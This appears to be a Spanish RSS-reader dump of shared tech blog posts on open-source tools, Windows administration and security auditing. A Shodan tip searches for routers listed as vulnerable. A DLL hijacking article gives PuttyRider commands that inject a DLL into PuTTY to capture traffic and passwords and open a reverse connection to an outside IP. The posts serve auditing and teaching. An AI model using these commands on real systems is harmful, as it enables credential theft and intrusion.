Shared posts

12 Oct 07:02

Shodan command-line (CLI). Tips. Buscando con xargs, download y parse.

by Alfon
Después de mucho tiempo sin escribir, creo que va siendo hora de ir quitando las telarañas del blog. En esta ocasión arranco con un pequeño tip sobre búsquedas con Shodan CLI. Una cosa sencilla, básica, pero que espero os sirva.

Al lio…

Se trata de realizar una búsqueda de dispositivos que son proclives a tener una posible vulnerabilidad. Hace unos días encontré un sitio ( https://www.redeszone.net/2017/04/21/vulnerabilidades-routers-linksys/ ) donde se exponía una serie de modelos de routers Linksys, concretamente 25 con una serie de vulnerabilidades:

Usaremos este archivo para nuestra búsqueda.

cat linksys.txt | xargs -I% shodan download % %

Ya lo tenemos:

Ya solo nos queda la búsqueda con shodan parse usando los archivos descargados json.gz de la forma:

dir *json.gz -1 | xargs -I% shodan parse --fields ip_str,port,org --separator , %

El resultado:

Evidentemente, esta es una posible forma de búsqueda. Podríamos usar también xargs y shodan host, por poner un ejemplo.

==================

Y como se trata de un breve tip, hasta aquí por hoy. Hasta la próxima. 😉

 

 

14 Mar 12:40

Glances

by bar foo

Glances es una herramienta parecida a top, htop o atop. Esta programada en python y funciona en cualquier sistema operativo. Tiene una aquitectura abierta y los desarrolladores pueden añadir plugins o exportar modulos.

Podemos instalarlo en Debian con:

# apt install glances

Si prefieres el código fuente: https://github.com/nicolargo/glances

La documentación esta en https://glances.readthedocs.io/en/stable/

Se puede ver en local, en remoto y mediante interfaz web.

https://raw.githubusercontent.com/nicolargo/glances/develop/docs/_static/glances-responsive-webdesign.png

Glances da mucha información de diferentes parametros del sistema. Te puedes guiar por colores: Verde – Ok Azul – Cuidado Magenta – Aviso Rojo – Critico

Nos muestra información de CPU, memoria, procesos, GPU, disco, red, wifi, puertos, sensores, etc.

En definitiva un herramienta de monitorización de nuestro sistema muy interesante.

07 Mar 15:49

Nuclear: Alternativa Open Source a Spotify

by Miguel Parada

Si el vídeo acabó con la estrella de la radio, escuchar música en Internet acabó con las tiendas de música de barrio. Ahora es muy cómodo disponer de toda la música que queramos con un simple click de ratón. Servicios como Spotify son una buena prueba de ello. Y hablando de Spotify, su popularidad también hace que cada día más usuarios se pregunten si existen mejores alternativas y ahí es donde encontramos a Nuclear, un software de código abierto con un diseño similar pero que utiliza servicios como Youtube y SoundCloud como base de su plataforma. También existe la posibilidad de añadir otras fuentes mediante plugins pero es algo que todavía está por desarrollar.

Como alternativa a Spotify no está mal, todavía un poco verde pero se pueden ver las intenciones.  En general notaremos que la interfaz arrastra varias limitaciones, comenzando por la ausencia de un botón para retroceder y un uso en su interface de colores poco atractivos. Pequeños fallos y carencias que supongo se irán resolviendo a medida que se incoporen desarrolladores al proyecto.

Podemos instalar Nuclear descargando el programa desde su repositorio en GitHub en sus versiones para Windows, MacOS y Linux.

 

07 Mar 15:47

ESP32 WiPhone, un teléfono móvil de código abierto VoIP para construir en casa

by Miguel Parada

¿Si te gusta cacharrerar los fines de semana qué te parece construir tu propio telefono VoIP? La tecnología de Voz sobre Internet ya lleva unos cuantos años con nosotros y se encuentra bien asentada y permite el realizar llamadas usando Internet pues permite que nuestra voz sea numerada y enviada bajo la forma de paquetes de datos. Prácticamente toda la totalidad de operadores soportan esta tecnología y ofertan servicios basada en ella. Una de las ventajas de la telefonía VoIP es que nos permite hacer llamadas internacionales a un coste muy reducido al no tener que pasar por el “peaje” de los operadores locales, también nos permite viajar a cualquier lugar y siempre que tengamos conexión a Internet realizar llamadas locales sin importar que nos encontremos en el último rincón del mundo.

ESP32 WiPhone es un teléfono basado en código y hardware abierto que podemos montar nosotros mismos con muy poco esfuerzo y sin tener conocimientos avanzados. Su aspecto recuerda a aquellos teléfonos que teníamos a finales de los 90. Así que si te gusta lo retro ya tienes un doble motivo para hacerte con uno. Pesa 80 gramos y a nivel de hardware no es nada comparable a los teléfonos inteligentes actuales:

 

  • 4MB PSRAM
  • 16MB Flash
  • 700 mAh Battery
  • ESP32 Dual core running at 240 MHz

Cuenta además con una batería de 700mAh que nos ofrece hasta 8 horas en conversación y cerca de una semana en espera. En cuanto al almacenamiento cuenta con una ranura para introducir una tarjeta microSD  y una conexión de audio jack. El teclado se come prácticamente la mitad de la pantalla dejando esta reducida a un tamaño de 2.4″ pulgadas (320×240).  Es como volver al pasado pero con la posibilidad de personalizarlo y expandirlo como queramos mediante su código MicroPython.

El ESP32 WiPhone todavía no se encuentra a la venta pero es posible suscribirse a la lista de correo para conocer más detalles del proyecto y ser la primera persona en hacerse con él. 🙂

07 Mar 15:43

Zulip, una excelente alternativa de código abierto a Slack

by David Naranjo

Zulip
Zulip es una potente aplicación de código abierto. Compite con Slack, IRC, Jabber y docenas de otras herramientas de chat grupales diseñadas para ayudar a los equipos (ya sean proyectos de código abierto o compañías) a colaborar de manera efectiva.

Zulip es compatible con la búsqueda rápida, la carga de archivos con arrastrar y soltar, vistas previas de imágenes, mensajes privados de grupo, notificaciones configurables, correos electrónicos de mensajes perdidos, procesamiento de mensajes de reducción y mucho más, esencialmente todo lo que pueda desear.

El proyecto fue desarrollado originalmente por Zulip y se abrió después de su absorción por Dropbox bajo la licencia Apache 2.0.

El código del lado del servidor está escrito en Python utilizando el marco de Django. El software cliente está disponible para Linux, Windows, macOS, Android e iOS, y también se proporciona una interfaz web integrada.

Principales características de Zulip

Zulip puede compararse con el servicio Slack y verse como un análogo intra-corporativo de Twitter, utilizado para la comunicación y discusión de problemas de trabajo en grandes grupos de empleados.

Además de ello proporciona medios para rastrear el estado y participar simultáneamente en varias discusiones utilizando el modelo similar a un hilo para mostrar mensajes, que es el mejor compromiso entre la vinculación a salas en Slack y un único espacio público de Twitter.

La visualización simultánea de todos los debates en forma de hilos le permite cubrir todos los grupos en un solo lugar, mientras mantiene una separación lógica entre ellos.

Las funciones de Zulip también incluyen soporte para enviar mensajes al usuario en modo fuera de línea (los mensajes se enviarán después de que aparezcan en línea), guardando el historial de discusión completo en el servidor y los medios para buscar el archivo.

También cuenta con el soporte para Markdown incorporado y formato de texto, herramientas para: notificaciones grupales, la capacidad de crear grupos cerrados, integración con Trac, Nagios, Githu b, Jenkins, Git, Subversion, JIRA, Puppet, RSS, Twitter y otros servicios, herramientas para vincular etiquetas visuales con mensajes.

Sobre la versión 2.0 de Zulip

Hace poco fue anunciado el lanzamiento de Zulip 2.0 el cual incluye algunas novedades que se pueden destacar.
Entre ellas encontramos en la parte del servidor de las herramientas integradas para copia de seguridad y recuperación.

Así como herramientas mejoradas significativamente para importar datos de Slack, HipChat, Stride y Gitter, que están optimizadas para importar bases de datos muy grandes con decenas de miles de usuarios y millones de mensajes.

Zulip

Integración LDAP mejorada y la capacidad de personalizar avatares de usuario, campos de perfil personalizados y estado de cierre de usuario en Active Directory.

Mayor soporte a la comunicación

Además de esto, otro punto positivo a destacar de este lanzamiento es el soporte inicial para el servicio de videoconferencia Zoom, además de los módulos de videollamada disponibles anteriormente a través de Google Hangouts y Jitsi.

Se proporcionaron herramientas de edición completas, que incluyen una interfaz para seleccionar emoji, enlaces, enlaces a video, marcado de marca de vista previa y suplemento de entrada contextual.

Los administradores tienen la oportunidad de eliminar todos los mensajes a la vez en la discusión (por ejemplo, para borrar un nuevo canal de los mensajes de prueba antes de enviar invitaciones).

De las demás características que se puedes destacar encontramos:

  • Soporte para configurar el estado de accesibilidad del usuario y la capacidad de crear sus propios mensajes con estado.
  • Se agregó la capacidad de crear enlaces reutilizables con invitaciones para conectarse a canales.
  • Se ha estabilizado la implementación de usuarios invitados que tienen derechos limitados.
  • Módulo agregado para la integración con ReviewBoard.
  • Proporcionó la integración del sistema de autenticación con Azure Active Directory.

¿Descarga e instalación de Zulip en Linux?

Los desarrolladores de Zulip proporcionan a los usuarios de Linux la aplicación en un formato AppImage el cual podemos descargar desde la terminal ejecutando el siguiente comando:

wget https://github.com/zulip/zulip-electron/releases/download/v2.3.82/Zulip-2.3.82-x86_64.AppImage -O zulip.AppImage

Damos permisos de ejecución con:
sudo chmod a+x zulip.AppImage

Y ejecutamos con:

./zulip.AppImage

Otro método de instalación es por medio de los paquetes Snap. La instalación la realizamos ejecutando en la terminal:
sudo snap install zulip

El artículo Zulip, una excelente alternativa de código abierto a Slack aparece primero en Zulip, una excelente alternativa de código abierto a Slack.

27 Feb 15:38

Una fuente de alimentación de diseño antiguo puede dañar un equipo actual

by Alejandro Cobo López

hardlimitRul3s nos trae una interesante información acerca de la compatibilidad de las fuentes de alimentación con un diseño antiguo con los nuevos PCs. Incluso en fuentes de mayor gama, el llamado «group regulated design» puede provocar daños en un PC actual. Tienes toda la información en este hilo de foro.

The post Una fuente de alimentación de diseño antiguo puede dañar un equipo actual appeared first on DPLinux.

21 Jan 12:29

Netcat: Herramienta avanzada de red en GNU Linux

by davidochobits

En el artículo de hoy vamos a tratar la herramienta Netcat, también conocida como Ncat y nc, para el diagnóstico de redes. Este programa es una utilidad repleta de características que lee y escribe...

La entrada Netcat: Herramienta avanzada de red en GNU Linux se publicó primero en ochobitshacenunbyte.

20 Jan 07:09

Windows: Impresora predeterminada script

by noreply@blogger.com (SYSADMIT .com)
09 Oct 07:08

Ya es posible correr KDE Plasma en una ARM Laptop Pinebook

by Miguel Parada

Cada vez se habla más de una era post-PC en donde dispositivos móviles disponen de la suficiente potencia y capacidades como para poder realizar las tareas más comunes en nuestro día a día. Así no es extraño que en los últimos años de los teléfonos inteligentes se ha ido adaptando para lograr la aclamada convergencia entre el escritorio convencional y móvil. En el camino estamos viendo también equipos híbridos con una gran eficiencia y economía capaz de acompañarnos en nuestros viajes durante horas sin necesidad de estar buscando desesperadamente un enchufe para su recarga.

Uno de esos dispositivos es el Pinebook , creado por un fabricante de hardware de China. El Pinebook es una computadora portátil de bajo coste (aproximadamente a 100 USD) con la funcionalidad que cualquiera puede esperar de un portátil de sus características. Está alimentado por una CPU ARM de 64 bits de cuatro núcleos con frecuencia de reloj de 1.2 GHz, y viene con 2 GB de RAM, 16 GB de almacenamiento eMMC y una pantalla LCD TN de 14 “a 1366×768. Más que suficiente para un uso ligero de Internet.

Ahora, gracias al estrecho trabajo y colaboración entre Blue Systems y Pinebook, acaba de presentarse una imagen de prueba para funcionar en estos dispositivos basada en GNU/Linux con escritorio KDE neon. Durante el proceso se han resuelto muchos errores en toda la pila de software, kernel, controladores de gráficos, Qt, empaquetado y en KDE Frameworks and Plasma. Lo que repercute en mejoras de rendimiento que hacen de KDE Plasma una excelente alternativa para estos tipos de dispositivos.

Siendo francos si ya cualquier entorno de escritorio para Linux de bajos recursos ya molaba mucho más que el presente en Windows 10, ahora ya tenemos un escritorio moderno que nada tiene que envidiar. 🙂

Fuente y más información: 

https://dot.kde.org/2018/08/22/kde-plasma-arm-laptop-pinebook
https://forum.pine64.org/showthread.php?tid=6443
https://files.kde.org/neon/images/pinebook-remix-nonfree/useredition/

09 Oct 06:54

OpenROV: Exploración subacuática con Raspberry Pi

by Miguel Parada

Cuando era pequeño uno de mis juguetes soñados era poder tener un submarino de radio control. Unos amigos tenían uno que usaban para jugar en la piscina en verano y ciertamente aquello era una locura. Recuerdo que hasta podía disparar unas piezas a  modo de torpedos, lo cual ya era la caña por aquellos años.  OpenROV no es juguete pero si puede ser el próximo objeto soñado por muchos aficionados a la tecnología. Armado con una Raspberry Pi 3 se trata de un dron subacuático desarrollado por la la compañía con sede en California, Trident y que llegó a recaudar más de 815,000 en Kickstarter.

El drone todavía no se encuentra a la venta pero se puede preordenar por unos 1499 dólares.  Pero antes de que nos echemos las manos a la cabeza hay que pensar que a diferencia de otras compañías Trident promete abrir su API para que todos podamos hackear el drone y darle el uso que queramos, por ejemplo explorar los fondos marinos sin necesidad de mojarnos ni un pelo o para patrullar muelles y vigilar nuestras embarcaciones.

 

Fuente: https://www.raspberrypi.org/

08 Oct 15:02

Veeam Backup: Exclusiones antivirus Windows Defender con GPO

by noreply@blogger.com (SYSADMIT .com)
03 Oct 06:44

Internet Archive recoge 1000 juegos arcade para evitar que caigan en el olvido

by Rubén Velasco

Los años pasan, la tecnología evoluciona a pasos agigantados, y lo que hoy puede ser una tecnología de lo más puntera al cabo de poco tiempo puede pasar a formar parte de lo retro y, sin nadie interesado en preservarlo, incluso terminar desapareciendo. Aquí es donde entra en juego Internet Archive, una organización sin ánimo de lucro cuya principal finalidad es preservar toda esta historia tecnológica para que, si alguien quiere rememorar viejos tiempos, pueda hacerlo fácilmente. Desde webs hasta programas y juegos, Internet Archive quiere preservar todo lo retro, y recientemente acaba de añadir a su biblioteca más de 1000 juegos arcade, juegos que, sin duda, han hecho historia.

Es cierto que cada vez es más complicado encontrar juegos retro en Internet. Nintendo, y otras compañías, parece querer acabar con su historia con las cruzadas que están llevando a cabo a través de Internet, cruzadas que ya se han tomado las primeras víctimas, como Emuparadise y TheISOZone, webs que permitían descargar juegos retro para jugarlos en un emulador.

Un duro golpe para los juegos retro: EmuParadise elimina todas las descargas de roms

Un duro golpe para los juegos retro: EmuParadise elimina todas las descargas de roms

Los juegos retro vuelven a estar de luto: TheISOZone echa el cierre a causa de la cruzada de Nintendo

Los juegos retro vuelven a estar de luto: TheISOZone echa el cierre a causa de la cruzada de Nintendo

The Internet Archive poco a poco va ampliando su base de datos retro y, sin meterse en conflictos legales, va sumando a la lista todo tipo de programas y juegos que, hace unos años, hicieron historia en Internet.

Los 1000 juegos arcade que ahora suma Internet Archive y que, con suerte, no desaparecerán de la red

Bajo la colección “internetarcade”, Internet Archive recoge más de 1000 juegos arcade clásicos que, desde ahora, están disponibles para todos los usuarios que quieran jugar a ellos.

Esta colección de juegos, que tenemos disponible en el siguiente enlace, recoge grandes y conocidos títulos como Street Fighter, Metal Slug, 1942, Galaga o Teenage Mutant Ninja Turtles, Pong o Pang, entre otros. Todos estos juegos los podemos jugar directamente desde el emulador. Además, si queremos, también podemos descargarlos, junto con su correspondiente BIOS, para poder jugarlos nosotros mismos en cualquier emulador que tengamos en nuestro ordenador.

Metal Slug Internet Archive Arcade

El emulador de la web no es perfecto, pero la posibilidad de descargar la rom y la BIOS para usarla en cualquier otro emulador, como MAME, o RetroArch, abre infinidad de posibilidades.

Poco a poco, Internet Archive va ampliando su colección retro, desde ordenadores, sistemas operativos y aplicaciones hasta juegos que han hecho historia. Sin duda, la única alternativa que tiene todo este contenido que, aunque en su día fue lo más avanzado, tecnológicamente hablando, hoy en día está destinado a desaparecer.

¿Qué te parece esta colección de juegos retro de Internet Archive?

Good Old Downloads se enfrenta a Nintendo y lanzará una plataforma para descargar roms retro

Good Old Downloads se enfrenta a Nintendo y lanzará una plataforma para descargar roms retro

El artículo Internet Archive recoge 1000 juegos arcade para evitar que caigan en el olvido se publicó en SoftZone.

03 Oct 06:44

Windows 10 October 2018 Update: cómo actualizar gratis a esta versión

by Rubén Velasco

Windows 10 October 2018 Update ya está aquí. Ya han pasado 5 meses desde que Microsoft lanzaba la que, hasta ahora, era la última versión del sistema operativo: Windows 10 April 2018 Update, una actualización tardía y, además, no precisamente una de las mejores. Desde el lanzamiento de esta actualización Microsoft ha estado trabajando en esta nueva actualización, una nueva versión de Windows que lleva con un importante número de cambios y mejoras para seguir mejorando todo el ecosistema Windows 10.

Desde hace apenas unos minutos, la nueva actualización a Windows 10 October 2018 Update ha empezado a llegar a todos los usuarios. Como es habitual, esta nueva versión es totalmente gratuita para todos los usuarios que ya tengan en su poder una licencia del sistema operativo y se podrá descargar de varias formas diferentes, formas que os vamos a explicar a continuación.

Cómo comprobar la versión de Windows 10 que tengo instalada

Antes de pensar en actualizar a Windows 10 October 2018 Update, lo primero que debemos hacer es asegurarnos de tener instaladas todas las actualizaciones disponibles en Windows Update, ya que las últimas actualizaciones preparan el sistema para esta nueva versión de Windows.

La April 2018 Update es la versión 1803 del sistema operativo, mientras que la nueva October 2018 Update corresponde con la 1810. Para comprobar la versión instalada, simplemente escribiremos “Acerca de tu PC” en Cortana para poder ver la ventana de información del sistema operativo, junto con la versión instalada.

Acerca de Windows 10 April 2018 Update Acerca de Windows 10 October 2018 Update

Si nos indica la versión 1803, entonces estamos utilizando la April 2018 Update, mientras que si la versión que nos aparece es la 1809, entonces el ordenador ya estará actualizado a la October 2018 Update. Lo mismo ocurre con las versiones anteriores; por ejemplo, la 1709 es la Fall Creators Update, mientras que la 1703 es la Creators Update.

Como suele ser habitual, la actualización no llega al 100% de las personas al mismo tiempo, sino que se va liberando por oleadas con el fin de reducir al mínimo los problemas durante el proceso de actualización. En el primer método que os citamos a continuación os explicamos la forma más fácil de instalarla si hemos sido elegidos en la primera oleada, mientras que el segundo método de instalar la actualización es a la fuerza, por si no nos aparece a través de Windows Update.

Windows 10 October 2018 Update: prepara tu ordenador para la nueva actualización de Microsoft

Windows 10 October 2018 Update: prepara tu ordenador para la nueva actualización de Microsoft

Cómo actualizar ya mismo a Windows 10 October 2018 Update

Cómo actualizar a Windows 10 October 2018 Update a través de Windows Update

La primera de las formas, y la más recomendable, es utilizar Windows Update, el centro de actualizaciones de Microsoft. Para ello, lo único que debemos hacer es abrir Windows Update en nuestro Windows 10 escribiendo “Buscar actualizaciones” en Cortana y, tras realizar la búsqueda, ya debería aparecernos la nueva versión de Windows 10.

Actualizar Windows 10 October 2018 Update Windows Update

El propio sistema operativo se encargará de descargar esta gran actualización, instalarla y llevar a cabo todas las tareas necesarias para poner en marcha el nuevo Windows 10 October 2018 Update en nuestro equipo.

Tras instalar la nueva actualización, todas nuestras aplicaciones, todos nuestros datos y todas nuestras configuraciones deberían estar tal cual estaban antes de la actualización, pudiendo disfrutar, una vez termine el proceso, de las mejoras y novedades de esta actualización.

Cómo actualizar a Windows 10 October 2018 Update con la herramienta de actualización para Windows 10

En caso de que a través de Windows Update no nos aparezca esta actualización, lo que debemos hacer entonces es utilizar la herramienta de actualización para Windows 10. Esta herramienta nos permite actualizar manualmente cualquier sistema a la última versión de Windows 10 y, además, crear un medio de instalación, como una memoria USB, para instalar Windows 10 o actualizar manualmente cualquier otro ordenador sin necesidad de conexión a Internet.

Windows 10 October 2018 Update - Crear ISO - Actualizar o crear medio

Tan pronto como la nueva versión de Windows 10 esté disponible para todos los usuarios, podremos descargar la nueva herramienta de creación de medios desde el siguiente enlace. Simplemente nos quedará ejecutarla y seguir el sencillo asistente para actualizar nuestro ordenador a la última versión de Windows 10.

Si aún no estás preparado para actualizar Windows 10, os explicamos cómo retrasar la actualización a Windows 10 October 2018 Update.

Microsoft te dirá cómo liberar espacio para instalar Windows 10 October 2018 Update

Microsoft te dirá cómo liberar espacio para instalar Windows 10 October 2018 Update

El artículo Windows 10 October 2018 Update: cómo actualizar gratis a esta versión se publicó en SoftZone.

02 Oct 06:54

Servidores de aplicaciones en Linux

by davidochobits

En el artículo de hoy vamos a intentar explicar que son los servidores de aplicaciones en Linux. La idea del artículo es dejar claro varios conceptos al respecto de los servidores de aplicaciones JAVA...

La entrada Servidores de aplicaciones en Linux se publicó primero en ochobitshacenunbyte.

28 Sep 06:50

MS Windows Server 2016 – Mover carpeta Windows Update a otra ubicación

by ragasys

Hola a tod@s.

En este post vamos a ver como mover la carpeta de Windows Update (actualizaciones automáticas) a otra ubicación, esto nos podría venir bien en caso de que no tengamos espacio en la unidad de sistema (disco C) y no dispongamos de más opciones para poder liberar espacio.

  • Para empezar vamos a ver dónde se ubica la carpeta dónde se descargan las actualizaciones a través de Windows Update, que será “C:\Windows\SoftwareDistribution”:

  • Ahora paramos y deshabilitamos el servicio de Windows Update:

  • Una vez parado el servicio, sobre otra de las unidades de nuestro sistema, en este caso, la unidad E (DATOS), vamos a crear una carpeta llamada “WindowsUpdate”:

  • Renombramos la carpeta de la unidad C “SoftwareDistribution” a “SoftwareDistributionold”:

  • Ahora nos abrimos un cmd como administrador:

  • Y ejecutamos el siguiente comando para realizar un enlace simbólico a la nueva ruta creada, es decir, a la carpeta “WindowsUpdate” de la unidad E:

  • Como podemos ver, el enlace simbólico, se ha creado correctamente:

  • Ahora copiamos todo el contenido de la carpeta “C:\Windows\SoftwareDistributionold” a la nueva ruta “E:\WindowsUpdate”:

  • Ahora eliminamos todo el contenido de la carpeta “C:\Windows\SoftwareDistributionold”:

  • Como podemos ver el enlace simbólico contiene todo el contenido de las actualizaciones automáticas, que estarían ubicados en otra unidad distinta a la del sistema:

  • Volvemos a habilitar e iniciar el servicio de Windows Update:

 

Fuente: Curso Instalación y configuración de Windows Server 2016 impartido por Jair Gómez

Saludos.

19 Sep 16:42

Auditar sistemas Windows para evitar DLL Hijacking.

by Álvaro Paz
Las auditorias de seguridad informática son muy importantes en lo que a seguridad informática se refiere, normalmente usamos dos puntos de vista: desde el punto de vista del atacante que seria una auditoria caja negra y desde el punto de vista del administrador que seria auditoria de caja blanca. Las auditorias es una de las respuestas a la pregunta: ¿cómo puede ayudarte la seguridad informática?, que se suelen hacer los no iniciados en el tema.

El DLL Hijacking, se debe a que Windows tiene una ruta de búsqueda para archivos DLL en su arquitectura subyacente. Se puede averiguar qué DLL requiere un ejecutable sin una ruta absoluta (desencadenando este proceso de búsqueda), se puede colocar una DLL comprometida en un lugar más arriba en la ruta de búsqueda para que se encuentre antes de la versión real y Windows así lo ejecutara, permitiendo colocar un código de ataque en la aplicación. Entonces, imaginemos que la ruta de búsqueda de DLL de Windows se ve así:


A). (directorio donde se encuentra el ejecutable)
B) \Windows"
C) \Windows\system32
D) \Windows\syswow64 (prioridad mas baja, menos controles)

Por ejemplo: un  ejecutable "Foo.exe" solicita la DLL "bar.dll", que casualmente reside en el subdirectorio “syswow64” (D). Esto da la oportunidad de colocar una versión maliciosa en A), B) o C) y se cargará en el ejecutable. Como indicó anteriormente, incluso una ruta completa absoluta no puede proteger contra este ataque, si se puede reemplazar la DLL con otra versión maliciosa.

Microsoft Windows protege el sistema utilizando el mecanismo de Protección de archivos de Windows para la carpeta “System32”, pero la mejor manera de proteger el ejecutable del secuestro de DLL es:
  • Usar rutas absolutas en lugar de ruta relativa.
  • En el caso de tener certificado digital, se deben firmar los archivos DLL y verificar el inicio de sesión de la aplicación antes de cargar el archivo DLL en la memoria, también se puede verificar el hash del archivo DLL con el hash DLL original. 
Por supuesto, esto tampoco está limitado a Windows. Cualquier sistema operativo que permita la vinculación dinámica de bibliotecas externas es teóricamente vulnerable a esto.

Con la herramienta Robber se puede auditar que DLL de un sistema Windows son sensibles a DLL Hijacking. Esta  aplicación usa un mecanismo simple para descubrir las DLL que son propensas al secuestro:
  • Escanea la tabla de importación de archivos ejecutables y descubre los archivos DLL que se vinculan a ejecutables.
  • Buscar archivos DLL ubicados dentro del ejecutable que coincidan con la DLL vinculada (como he dicho antes, el directorio de trabajo actual del ejecutable tiene la prioridad más alta).
  • Si encuentra alguna DLL, escanea la tabla de exportación.
  • Compara la tabla de importación del ejecutable con la tabla de exportación de la DLL y si se encontró alguna coincidencia, el ejecutable y las funciones comunes coincidentes la marcara como candidato a DLL Hijacking.

Entre la características principales de Robber destaca:
  • Posibilidad de seleccionar el tipo de escaneo (aplicaciones firmadas/no firmadas).
  • Determinar firmante ejecutable.
  • Determinar qué DLL de referencia es candidato para DLL Hijacking.
  • Permite determine los nombres de los métodos exportados de las DLL candidatas.
  • Permite configurar las reglas para determinar qué DLL es mas sensible a Hijacking y las muestra en diferentes colores.

Más información y descarga de Robber:
https://github.com/MojtabaTajik/Robber

Un ejemplo del ataque de DLL Hijacking es PuttyRider, lo que hace esta herramienta es  montar la sesión Putty pudiendo esnifar el tráfico (incluido contraseñas) e inyectar comandos con los privilegios de usuario.  También utiliza DLL Hijacking y function hooking para secuestrar el proceso de Putty y funciona con todas las ultimas versiones (Windows 8, Windows 7, etc) y no requiere privilegios de administración.

Ejemplos de uso:

Enumerar los procesos de Putty existentes y su estado (inyectado/no inyectado)

PuttyRider.exe -l

Inyectar DLL en el primer “putty.exe” encontrado e iniciar una conexión inversa desde la DLL a una IP:Puerto.

PuttyRider.exe -p 0 -r 192.168.0.55:8080

Ejecutar en segundo plano y esperar nuevos procesos de Putty. Inyectar en cualquier putty.exe nuevo y escribir todas las conversaciones en archivos locales.

PuttyRider.exe -w -f

Expulsar PuttyRider.dll de todos los procesos de Putty donde ya está inyectado. (hay que matar a PuttyRider.exe si se ejecuta en modo -w, de lo contrario reinyectará).

PuttyRider.exe -x


Más información y descarga de PuttyRider:
https://github.com/seastorm/PuttyRider

Auditorias de seguridad informática:
https://www.gurudelainformatica.es/2005/12/auditorias-de-seguridad.html

08 Jun 17:40

GPO para delegar tareas administrativas del Active Directory a otros Administradores de Sistemas

by ragasys

Hola a tod@s.

En este post vamos a ver como delegar tareas administrativas del Active Directory a otros Administradores de Sistemas, según nuestra organización del Active Directory, que lo hemos organizado por sedes (Madrid, Barcelona, Valencia, Sevilla y Bilbao), vamos a suponer que en cada sede tenemos un Administrador de sistemas que será el encargado de administrar todo lo que se anide dentro de su Unidad Organizativa correspondiente, con esto conseguimos que cada Administrador sólo pueda configurar la parte que le corresponda.

  • Esta es nuestra estructura organizativa del Active Directory:

  • Todos los grupos y usuarios que vamos a crear lo haremos dentro de una Unidad Organizativa llamada “AdminsIT” anidada dentro de la OU “IT”:

  • Lo primero que vamos a realizar será crearnos un grupo de seguridad global llamado “AdministradoresIT”, dentro de la OU que hemos creado:

  • Ahora nos vamos a crear 5 grupos de seguridad global, uno por cada sede, esto lo haremos por si en un futuro necesitamos que más de un Administrador de Sistemas se encarguen de una sede, y simplemente con añadir el nuevo usuario administrador al grupo correspondiente podrá administrar la Unidad Organizativa que le corresponda:

  • Ahora vamos a añadir los 5 grupos de administradores creados por sedes como “Miembros” del grupo “AdministradoresIT”:

  • Una vez que hemos creado y organizado los grupos, vamos a proceder a crear las cuentas de usuario para cada Administrador de Sistemas de cada sede, esta cuenta de “Administrador de sede” no tendrá nada de especial, simplemente es una cuenta más de usuario del Active Directory, las tareas administrativas se la vamos a delegar por GPO:

  • Una vez creada las cuentas de usuario, las vamos a añadir como “Miembros” de su grupo correspondiente:

  • Ahora en cada OU que hemos organizado por sede vamos a delegar el control a los grupos de administradores que nos hemos creado, voy a mostrar como se realiza en la OU de Madrid, para las demás seguiremos el mismo proceso:

  • Se nos abre el siguiente asistente:

  • Agregamos el grupo de administradores que corresponda a la OU, en este caso “AdministradoresMad”:

  • Creamos una tarea personalizada para delegar:

  • Le indicamos que vamos a delegar el control en esta OU y todo lo que se anide dentro:

  • Ahora le asignamos los permisos que nos interesen, en este caso, le hemos asignado “Control Total” sobre la OU:

  • Finalizamos el asistente:

  • Como podemos ver los permisos para delegar el control sobre la OU, se han aplicado correctamente:

  • Para las demás sedes vamos a realizar el mismo proceso:

  • Con esto ya tendríamos organizado nuestro Active Directory para delegar tareas administrativas, ahora nos vamos a crear algunas GPOs que las vincularemos por sedes y así tendremos completadas todas las tareas necesarias para la delegación de los trabajos por sede, estas GPOs son para que los Administradores de cada sede sean “Administradores Locales” de las máquinas que están en su sede y que les tocará administrar.
  • Para la sede de Barcelona nos quedaría:

  • Para la sede de Bilbao nos quedaría:

  • Para la sede de Madrid nos quedaría:

  • Para la sede de Sevilla nos quedaría:

  • Para la sede de Valencia nos quedaría:

  • Por último, nos crearemos una GPO para que los administradores de cada sede puedan agregar equipos al dominio, esta GPO la vincularemos sobre la raíz del dominio y la colocaremos un nivel por encima de las “Default Domain Policy”:

  • Con todo esto ya tendríamos nuestra Administración de Sistemas delegadas por sedes.

 

Saludos y espero que os sea de ayuda 😉

08 Jun 17:35

Vembu BDR Suite Versiones Free, Standard y Enterprise

by ragasys

Hola a tod@s,

En versiones anteriores, Vembu BDR Suite solo tenía disponible una sola edición.

Con el lanzamiento de la versión 3.9.1, hay disponible en 3 ediciones: Free, Standard y Enterprise . Desde ahora los usuarios pueden elegir la edición que mejor se adapte a sus necesidades empresariales.

Vembu VMBackup Standard Edition ofrece una solución de protección de datos para entornos de virtualización, tanto para plataformas VMware como  para Microsoft Hyper-V.
La edición Standard está diseñada para las pequeñas y medianas empresas, que les ayudará a cumplir con las necesidades de Service Level Agreement actuales de copia de seguridad y recuperación de datos a un precio mucho más asequible que la versión Enterprise.
Vembu BDR Standard, tiene una amplia lista de funciones tanto para la copia de seguridad como para la recuperación de datos. Su principal objetivo es ofrecer una solución de protección de datos fácil de administrar y de gran potencia, para las pequeñas y medianas empresas a un precio asequible, con esta suite las PYMES conseguirán proteger toda su infraestructura virtual con funciones como:
  • Copia de seguridad de Máquinas Virtuales sin necesidad de instalar un agente, tanto VMware com para Hyper-V. 
  • Recuperación rápida de Máquinas Virtuales.
  • Recuperación instantánea de archivos.
  • Recuperación granular para aplicaciones para garantizar Recovery Time Objective o RTO menor a los 15 minutos.
  • Tampoco tiene restriccionaes en el escalado de almacenes de datos.
Podemos usar cualquier tipo de soporte de almacenamiento, que cumpla con nuestras necesidades de espacio y retención. Vembu BDR Standard, también nos ofrecerá compresión y deduplicación para optimizar el espacio disponible de nuestro almacenamiento.
Usando el algoritmo de cifrado AES-256, Vembu BDR Standard, nos garantizará que nuestros datos estén seguros en el envío de datos durante el proceso de copia y también queden cifrados una vez copiados en el almacenamiento de copia.

La versión estándar para VMware Backup tiene un precio de USD 216/CPU-socket/año. Si su requerimiento se incluye en 6 sockets de CPU, obtendrá un descuento adicional del 50% que podría generar USD 108/CPU-socket/año.

La Edición estándar para Hyper-V Backup tiene un precio de USD 144/ CPU-socket/año, y se reduce a USD 72/CPU-socket/año si se encuentra dentro de la categoría de descuento mencionada anteriormente.

En este enlace puede encontrar una comparación entre ediciones, Comparación Ediciones Vembu BDR Suite 3.9.1

En este enlace podemos descargar la última versión de Vembu BDR Suite 3.9.1

Post sponsorizado por Vembu Technologies

 

20 May 17:34

Altaro: Configurar orígen a respaldar

by noreply@blogger.com (SYSADMIT .com)
03 Apr 18:06

Arrancar un clúster de Red Hat de manera ordenada

by davidochobits

